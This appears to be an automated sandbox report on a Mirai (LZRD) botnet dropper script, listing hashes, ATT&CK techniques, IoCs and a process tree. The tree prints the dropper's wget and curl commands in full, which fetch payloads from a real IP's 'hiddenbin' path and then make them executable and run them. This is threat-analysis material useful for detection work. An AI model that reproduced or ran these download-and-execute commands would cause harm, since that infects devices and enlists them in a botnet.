mirai | cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea

Analysis

max time kernel
149s
max time network
149s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
22-12-2024 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.sh
Size

2KB
MD5

8364b34731a2e12ce67c2cfcb2811e75
SHA1

5d718457dfa0ecc1a46528696d2769d11adf018f
SHA256

cbeb5e39ef97058edd87f838971c4bab379a1a76a3b07b60cd9734efd8154cea
SHA512

ca94f2b3643f6047efc405c15eab8fce850602cb28dbf36d760e7b6010df32c202066ab2ef66a79e0437792d8b5babc6f7a5742f7cb26df6e6354b55e1c837f9

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
811	chmod
731	chmod
737	chmod
743	chmod
764	chmod
788	chmod
805	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/Space	732	Space
/tmp/Space	738	Space
/tmp/Space	744	Space
/tmp/Space	765	Space
/tmp/Space	789	Space
/tmp/Space	807	Space
/tmp/Space	812	Space

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx
behavioral4/files/fstream-7.dat	upx
behavioral4/files/fstream-8.dat	upx
behavioral4/files/fstream-9.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/76/status	Space
File opened for reading	/proc/697/status	Space
File opened for reading	/proc/700/status	Space
File opened for reading	/proc/5/status	Space
File opened for reading	/proc/12/status	Space
File opened for reading	/proc/13/status	Space
File opened for reading	/proc/16/status	Space
File opened for reading	/proc/36/status	Space
File opened for reading	/proc/812/status	Space
File opened for reading	/proc/23/status	Space
File opened for reading	/proc/70/status	Space
File opened for reading	/proc/378/status	Space
File opened for reading	/proc/666/status	Space
File opened for reading	/proc/704/status	Space
File opened for reading	/proc/11/status	Space
File opened for reading	/proc/692/status	Space
File opened for reading	/proc/421/status	Space
File opened for reading	/proc/6/status	Space
File opened for reading	/proc/15/status	Space
File opened for reading	/proc/24/status	Space
File opened for reading	/proc/71/status	Space
File opened for reading	/proc/311/status	Space
File opened for reading	/proc/672/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/20/status	Space
File opened for reading	/proc/150/status	Space
File opened for reading	/proc/310/status	Space
File opened for reading	/proc/369/status	Space
File opened for reading	/proc/8/status	Space
File opened for reading	/proc/221/status	Space
File opened for reading	/proc/315/status	Space
File opened for reading	/proc/663/status	Space
File opened for reading	/proc/670/status	Space
File opened for reading	/proc/792/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/9/status	Space
File opened for reading	/proc/77/status	Space
File opened for reading	/proc/146/status	Space
File opened for reading	/proc/784/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/18/status	Space
File opened for reading	/proc/698/status	Space
File opened for reading	/proc/815/status	Space
File opened for reading	/proc/167/status	Space
File opened for reading	/proc/340/status	Space
File opened for reading	/proc/802/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/17/status	Space
File opened for reading	/proc/74/status	Space
File opened for reading	/proc/78/status	Space
File opened for reading	/proc/82/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/75/status	Space
File opened for reading	/proc/84/status	Space
File opened for reading	/proc/106/status	Space
File opened for reading	/proc/1/status	Space
File opened for reading	/proc/10/status	Space
File opened for reading	/proc/679/status	Space
File opened for reading	/proc/699/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/21/status	Space
File opened for reading	/proc/116/status	Space

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
800	curl
804	cat
768	wget
777	curl
786	cat
793	wget

Writes file to tmp directory 17 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Space.arc	curl
File opened for modification	/tmp/Space.x86	wget
File opened for modification	/tmp/Space.x86_64	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Space.mips64	curl
File opened for modification	/tmp/Space.mpsl	wget
File opened for modification	/tmp/Space.arm	wget
File opened for modification	/tmp/Space.arc	wget
File opened for modification	/tmp/Space	1.sh
File opened for modification	/tmp/Space.i686	wget
File opened for modification	/tmp/Space.i686	curl
File opened for modification	/tmp/Space.arm	curl
File opened for modification	/tmp/Space.x86	curl
File opened for modification	/tmp/Space.x86_64	curl
File opened for modification	/tmp/Space.mips	wget
File opened for modification	/tmp/Space.mips	curl
File opened for modification	/tmp/Space.mpsl	curl

/tmp/1.sh
/tmp/1.sh
1⤵
- Writes file to tmp directory
PID:700
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:703
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:709
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:723
- /bin/cat
  cat Space.arc
  2⤵
  PID:730
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:732
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:734
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:735
- /bin/cat
  cat Space.x86
  2⤵
  PID:736
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.x86 systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:738
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:740
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat Space.x86_64
  2⤵
  PID:742
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:746
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:753
- /bin/cat
  cat Space.i686
  2⤵
  PID:762
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:765
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:768
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:777
- /bin/cat
  cat Space.mips
  2⤵
  - System Network Configuration Discovery
  PID:786
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:789
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:793
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.mips64
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:800
- /bin/cat
  cat Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:804
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:807
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.mpsl
  2⤵
  - Writes file to tmp directory
  PID:808
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/cat
  cat Space.mpsl
  2⤵
  PID:810
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-KAjNN1
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:812
- /usr/bin/wget
  wget http://154.216.20.221/hiddenbin/Space.arm
  2⤵
  - Writes file to tmp directory
  PID:848
- /usr/bin/curl
  curl -O http://154.216.20.221/hiddenbin/Space.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:849

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Space

Filesize
37KB

MD5
b73e8fbb7aee4bbe5902554d6ab22092

SHA1
620097bfd55d8ade8d138bb2ba10e8d4c43fd105

SHA256
22dfde185b0b8051baf38817b34383b65d9dbe7ef4f09ad9cd856154c0709d04

SHA512
d42eed1c1ac183241f787c967d627e3df379c13c2b992c83c3cd9cdd5ee1446e8898709ad1472ba31a36aab9cbdc04b9c0a7c36668e39c8d26d5b808bb4ea9d8

Download Submit
/tmp/Space

Filesize
36KB

MD5
57c14d83bcaba972ea0b53c6814e9f65

SHA1
9834b2c220567c48d38ca9150a65e8145e6a0f36

SHA256
07d4715e63470114117c803268c02a590af4e83c00fb0251be96032e136dabbf

SHA512
7e14e067f428e598241038c80d517c9d22003e55d32c6bb64b153215b58ca2aee7c3ebf1538989e156c288f61e6f49a858f9cd02e0f4a92d15bc4d772348dd92

Download Submit
/tmp/Space

Filesize
37KB

MD5
f1ec41bcdeefed4e7d8a5495c6f07a92

SHA1
189e68405fe81999a6743eefb5522b35c5d0056b

SHA256
ed564aaa907b55f773c3a1de910979d25652bccb5cc407a260cb16652c2d5cd7

SHA512
26cb39a606efc65e524287053445d46639bb88af34cf4d0e81bd55154be8636bf77c36b11822aa355046771267df6a917bce4558780feda0001166d2385a1f04

Download Submit
/tmp/Space

Filesize
43KB

MD5
ba5ceb1218e230d2029a3206061e2e92

SHA1
f8c1c20e355c1fc999b414141c1e26c456b0241d

SHA256
d61fd8e146be70d9228432177c62353000a2b7f3d5576453fe5d04cc2c9afdb2

SHA512
7290e14d04ac418f61c2d81affda96b4a9e4e2f2f5725868bc81607377716986e1c37269cad4c6b2aaa8d8de219294e0b35944aecb700c21dbf4d48fed926192

Download Submit
/tmp/Space

Filesize
43KB

MD5
3b1cb727157441d278758d0239d67568

SHA1
697ae421852b7a37b14aa50c53bbc021a945219f

SHA256
2b1b962faced1e868d145d153cf321e4aa3824c2f2863c62a2a37f0db8592f0b

SHA512
8f0815fd098eda143f480c647eb69b244632071cdcb2d6f916b93b023a7fd541d333b8d034de7aaa5f77f642a88284fa5801ef7a63f24fd5abd4f1dfeb51d71d

Download Submit
/tmp/Space.arc

Filesize
113KB

MD5
0fdd3e751fa9d0f60c5a218e4269c9ad

SHA1
0d9ae7d06494f59cfc3bfba8e162e29630159be3

SHA256
81749b59ba614b200a57dd0990104117748a04add1ce6f28528328fb50e19528

SHA512
2b9ab36b3f5fd535ff322c4ac3fcad543b3d6da8fdbad80c6dfad309bf33e340ed9871453f7614d3a35395e7afd23066d7c766fb7b4466ccf591e570300ae0de

Download Submit
/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit